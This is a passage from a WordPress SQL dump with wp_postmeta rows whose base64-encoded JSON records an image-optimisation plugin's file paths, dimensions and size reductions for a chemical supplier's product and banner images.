OC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWJhbm5lci0xLWUxNDcyODQzNDA1NDg4LTIwMHg2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1iYW5uZXItMS1lMTQ3Mjg0MzQwNTQ4OC0yMDB4NjguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0NDkxLCJpZCI6MTIyM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1iYW5uZXItMS1lMTQ3Mjg0MzQwNTQ4OC0yMjV4NjguanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0Ijo2OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1iYW5uZXItMS1lMTQ3Mjg0MzQwNTQ4OC0yMjV4NjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tYmFubmVyLTEtZTE0NzI4NDM0MDU0ODgtMjI1eDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDQ5MywiaWQiOjEyMjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tYmFubmVyLTEtZTE0NzI4NDM0MDU0ODgtNTEweDY4LmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tYmFubmVyLTEtZTE0NzI4NDM0MDU0ODgtNTEweDY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWJhbm5lci0xLWUxNDcyODQzNDA1NDg4LTUxMHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ0OTUsImlkIjoxMjIzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tYmFubmVyLTEtZTE0NzI4NDM0MDU0ODgtMTE0eDY4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWJhbm5lci0xLWUxNDcyODQzNDA1NDg4LTExNHg2OC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWJhbm5lci0xLWUxNDcyODQzNDA1NDg4LTExNHg2OC5qcGciLCJyZWR1Y3Rpb24iOjM1NSwidGltZSI6MTQ4MzU3NDQ5OCwiaWQiOjEyMjN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1iYW5uZXItMS1lMTQ3Mjg0MzQwNTQ4OC0xNjB4NjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tYmFubmVyLTEtZTE0NzI4NDM0MDU0ODgtMTYweDY4LmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiNjgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tYmFubmVyLTEtZTE0NzI4NDM0MDU0ODgtMTYweDY4LmpwZyIsInJlZHVjdGlvbiI6OSwidGltZSI6MTQ4MzU3NDUwMCwiaWQiOjEyMjN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1iYW5uZXItMS1lMTQ3Mjg0MzQwNTQ4OC0xODB4NjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tYmFubmVyLTEtZTE0NzI4NDM0MDU0ODgtMTgweDY4LmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiNjgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tYmFubmVyLTEtZTE0NzI4NDM0MDU0ODgtMTgweDY4LmpwZyIsInJlZHVjdGlvbiI6MzIsInRpbWUiOjE0ODM1NzQ1MDIsImlkIjoxMjIzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tYmFubmVyLTEtZTE0NzI4NDM0MDU0ODgtMjQ3eDY4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWJhbm5lci0xLWUxNDcyODQzNDA1NDg4LTI0N3g2OC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWJhbm5lci0xLWUxNDcyODQzNDA1NDg4LTI0N3g2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ1MDQsImlkIjoxMjIzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tYmFubmVyLTEtZTE0NzI4NDM0MDU0ODgtMzAweDY4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWJhbm5lci0xLWUxNDcyODQzNDA1NDg4LTMwMHg2OC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWJhbm5lci0xLWUxNDcyODQzNDA1NDg4LTMwMHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ1MDYsImlkIjoxMjIzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tYmFubmVyLTEtZTE0NzI4NDM0MDU0ODgtNDAweDY4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWJhbm5lci0xLWUxNDcyODQzNDA1NDg4LTQwMHg2OC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWJhbm5lci0xLWUxNDcyODQzNDA1NDg4LTQwMHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ1MDgsImlkIjoxMjIzfV0='); 
INSERT INTO `wp_postmeta` VALUES (29688, 1220, 'wpfc_optimisation_reduction', '21841'); 
INSERT INTO `wp_postmeta` VALUES (29689, 1220, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLXBvbHlmdW5jdGlvbmFsLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLXBvbHlmdW5jdGlvbmFsLmpwZyIsIndpZHRoIjo0OTI4LCJoZWlnaHQiOjMyNjQsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NzQ1MTMsImlkIjoiMTIyMCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLXBvbHlmdW5jdGlvbmFsLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLXBvbHlmdW5jdGlvbmFsLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLXBvbHlmdW5jdGlvbmFsLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo3ODksInRpbWUiOjE0ODM1NzQ1MTYsImlkIjoxMjIwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS1wb2x5ZnVuY3Rpb25hbC04MDB4NTMwLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS1wb2x5ZnVuY3Rpb25hbC04MDB4NTMwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hFTE9YWS1wb2x5ZnVuY3Rpb25hbC04MDB4NTMwLmpwZyIsInJlZHVjdGlvbiI6MjM1NiwidGltZSI6MTQ4MzU3NDUyMCwiaWQiOjEyMjB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLXBvbHlmdW5jdGlvbmFsLTc2OHg1MDkuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MDksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLXBvbHlmdW5jdGlvbmFsLTc2OHg1MDkuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLXBvbHlmdW5jdGlvbmFsLTc2OHg1MDkuanBnIiwicmVkdWN0aW9uIjoyMTQ4LCJ0aW1lIjoxNDgzNTc0NTIzLCJpZCI6MTIyMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktcG9seWZ1bmN0aW9uYWwtMTYwMHgxMDYwLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLXBvbHlmdW5jdGlvbmFsLTE2MDB4MTA2MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktcG9seWZ1bmN0aW9uYWwtMTYwMHgxMDYwLmpwZyIsInJlZHVjdGlvbiI6MTAzOTAsInRpbWUiOjE0ODM1NzQ1MjcsImlkIjoxMjIwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS1wb2x5ZnVuY3Rpb25hbC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS1wb2x5ZnVuY3Rpb25hbC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hFTE9YWS1wb2x5ZnVuY3Rpb25hbC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTM4LCJ0aW1lIjoxNDgzNTc0NTMxLCJpZCI6MTIyMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktcG9seWZ1bmN0aW9uYWwtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktcG9seWZ1bmN0aW9uYWwtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktcG9seWZ1bmN0aW9uYWwtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQ1NSwidGltZSI6MTQ4MzU3NDUzNCwiaWQiOjEyMjB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLXBvbHlmdW5jdGlvbmFsLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLXBvbHlmdW5jdGlvbmFsLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLXBvbHlmdW5jdGlvbmFsLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1MDQsInRpbWUiOjE0ODM1NzQ1MzcsImlkIjoxMjIwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS1wb2x5ZnVuY3Rpb25hbC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS1wb2x5ZnVuY3Rpb25hbC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hFTE9YWS1wb2x5ZnVuY3Rpb25hbC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTc1NywidGltZSI6MTQ4MzU3NDU0MSwiaWQiOjEyMjB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktcG9seWZ1bmN0aW9uYWwtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktcG9seWZ1bmN0aW9uYWwtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktcG9seWZ1bmN0aW9uYWwtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjQwNCwidGltZSI6MTQ4MzU3NDU0NCwiaWQiOjEyMjB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktcG9seWZ1bmN0aW9uYWwtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktcG9seWZ1bmN0aW9uYWwtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktcG9seWZ1bmN0aW9uYWwtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjM5OSwidGltZSI6MTQ4MzU3NDU0OCwiaWQiOjEyMjB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktcG9seWZ1bmN0aW9uYWwtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktcG9seWZ1bmN0aW9uYWwtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktcG9seWZ1bmN0aW9uYWwtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjQxNCwidGltZSI6MTQ4MzU3NDU1MSwiaWQiOjEyMjB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktcG9seWZ1bmN0aW9uYWwtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktcG9seWZ1bmN0aW9uYWwtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktcG9seWZ1bmN0aW9uYWwtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjQ3OSwidGltZSI6MTQ4MzU3NDU1NCwiaWQiOjEyMjB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktcG9seWZ1bmN0aW9uYWwtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktcG9seWZ1bmN0aW9uYWwtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktcG9seWZ1bmN0aW9uYWwtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjUyOSwidGltZSI6MTQ4MzU3NDU1OCwiaWQiOjEyMjB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktcG9seWZ1bmN0aW9uYWwtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktcG9seWZ1bmN0aW9uYWwtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktcG9seWZ1bmN0aW9uYWwtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjY3OSwidGltZSI6MTQ4MzU3NDU2MSwiaWQiOjEyMjB9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29690, 1218, 'wpfc_optimisation_reduction', '47373'); 
INSERT INTO `wp_postmeta` VALUES (29691, 1218, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXNvbHZlbnQtYmFubmVyLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXNvbHZlbnQtYmFubmVyLmpwZyIsIndpZHRoIjo5NDUsImhlaWdodCI6NjgsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9vcHRlb24tc29sdmVudC1iYW5uZXIuanBnIiwicmVkdWN0aW9uIjo0NzEzMywidGltZSI6MTQ4MzU3NDU2OCwiaWQiOiIxMjE4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc29sdmVudC1iYW5uZXItMzQweDY4LmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50X